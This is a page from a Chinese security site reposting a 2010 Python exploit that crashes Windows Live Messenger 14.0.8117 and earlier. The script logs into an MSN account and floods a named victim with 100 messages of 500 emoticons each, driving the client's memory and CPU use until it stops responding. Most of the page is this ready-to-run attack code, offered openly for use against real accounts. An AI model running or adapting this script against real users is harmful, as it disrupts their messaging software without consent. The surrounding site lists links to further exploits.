首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Windows Live Messenger <= 14.0.8117 Animation Remote Denial of Service
来源:gsog2009 [a7] hotmail [d0t] com 作者:TheLeader 发布时间:2010-08-12  

# Exploit Title: Windows Live Messenger <= 14.0.8117 animation remote Denial of Service
# Date: 11/08/2010
# Author: TheLeader
# Email: gsog2009 [a7] hotmail [d0t] com
# Software Link: http://explore.live.com/windows-live-messenger
# Version: 14.0.8117 and prior
# Tested on: Windows 7 x86

# msnlib required: http://blitiri.com.ar/p/msnlib/
# Greets: forums.hacking.org.il - <3UGUYS
# SP. thx goes to Alberto <albertito [a7] blitiri [d0t] com [d0t] ar> for
#              the msnlib library / Original msnbot example (that I modded =] )

# Description:
# Windows Live Messenger is prone to a Denial of Service attack. By sending
# specially crafted messages that contain a large number of animations ("Smileys"),
# it is possible to make WLM consume large amounts of memory and CPU while
# it attempts to render the animated images, causing it to stop responding.

import sys
import time
import select
import socket
import thread
import msnlib
import msncb

payload = ":'(" * 500

m = msnlib.msnd()
m.cb = msncb.cb()

def do_work():
 time.sleep(15)
 
 for i in range(100):
  print m.sendmsg(victim, payload)
 
 time.sleep(30)
 quit()


try:
 m.email = sys.argv[1]
 m.pwd = sys.argv[2]
 victim = sys.argv[3]
except:
 print "Usage: msnkeep.py account password victim_account"
 sys.exit(1)

m.login()
m.sync()

m.change_status("online")

def quit():
 try:
  m.disconnect()
 except:
  pass
 sys.exit(0)

thread.start_new_thread(do_work, ())

while 1:
 t = m.pollable()
 infd = t[0]
 outfd = t[1]

 try:
  fds = select.select(infd, outfd, [], 0)
 except:
  quit()
 
 for i in fds[0] + fds[1]:
  try:
   m.read(i)
  except ('SocketError', socket.error), err:
   if i != m:
    m.close(i)
   else:
    quit()

 time.sleep(0.01)


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Mediacoder 0.7.5.4710 Buffer O
·RightMark Audio Analyzer 6.2.3
·Microsoft Windows 'SfnLOGONNOT
·Abac Karaoke 2.15 Denial of Se
·Msxml2.XMLHTTP.3.0 Response Ha
·RSP MP3 Player OCX ActiveX Buf
·Microsoft Windows CreateWindow
·sonique2 (.xpl File) Local Sta
·Microsoft SMB Server Trans2 Ze
·Arora browser + Mozilla Firefo
·WM Downloader 3.1.2.2 Buffer O
·Easy FTP Server v1.7.0.11 Mult
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved